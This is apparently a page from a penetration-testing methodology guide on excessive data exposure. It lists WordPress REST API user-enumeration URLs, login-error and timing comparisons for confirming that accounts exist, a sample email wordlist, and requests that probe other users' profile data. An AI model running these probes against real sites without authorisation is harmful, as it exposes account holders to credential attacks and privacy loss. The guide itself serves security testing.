search

Excessive Data Exposure

hashtag
Check List

hashtag
Methodology

hashtag
Black Box

hashtag
WordPress User Enumeration via Public REST API

1

Check if the target is running WordPress

2

Send a direct GET request to the default WordPress REST API users endpoint

https://target.com/wp-json/wp/v2/users
3

Alternative endpoints (in case the main one is blocked)

https://target.com/wp-json/wp/v2/users/?per_page=100
https://target.com/wp-json/wp/v2/users/1
https://target.com/index.php?rest_route=/wp/v2/users
https://target.com/wp-json/wp/v2/users/me
4

If the response returns a JSON array with user objects containing any of these fields → vulnerability confirmed

id, name, slug, username, login, nickname, url, description
5

Enumerate user IDs sequentially

https://target.com/wp-json/wp/v2/users/1
https://target.com/wp-json/wp/v2/users/2
...
https://target.com/wp-json/wp/v2/users/100

hashtag
Information Disclosure via Verbose Error Messages

1

Discover any authentication or ID-based endpoint Common ones

/api/login, /api/auth, /v1/sessions, /api/v2/users/{id}, /api/forgot-password, /api/check-email
2

Send a request with a completely fake/non-existent user/ID/email

{"email": "this-user-definitely-does-not-exist-12345@target.com", "password": "anything"}
3

Capture the exact error message and status code

4

Now send the same request with a real-looking but still fake value (or incremental ID)

{"email": "admin@target.com", "password": "wrong"}
5

Compare the two responses – look for any of these differences

Fake user response
Real user response
Meaning

"User does not exist"

"Invalid password"

User exists → Enumeration confirmed

"Invalid credentials"

"Password is incorrect"

Same

404 Not Found

401 Unauthorized or 403 Forbidden

Same

"account_not_found"

"wrong_password"

Same

Response time 80 ms

Response time 350 ms

Possible existence

6

Build a small wordlist of probable emails

admin@target.com
support@target.com
john.doe@target.com
jdoe@target.com

hashtag
Information Disclosure

1

Create a normal/low-privilege account on the target

2

Find any API endpoint that returns data about yourself or your resources Common ones

GET /api/me
GET /api/v1/profile
GET /api/v2/user
3

Call the endpoint with your account and capture the full JSON response

4

Try the same endpoint with other users’ identifiers (if possible)

GET /api/v3/accounts?name=admin
GET /api/v3/accounts?id=1
5

If we get additional data by sending another username or email address, the vulnerability is confirmed

hashtag
White Box

hashtag
Cheat Sheet

PreviousBroken AuthenticationNextLack of Resources and Rate Limiting

Last updated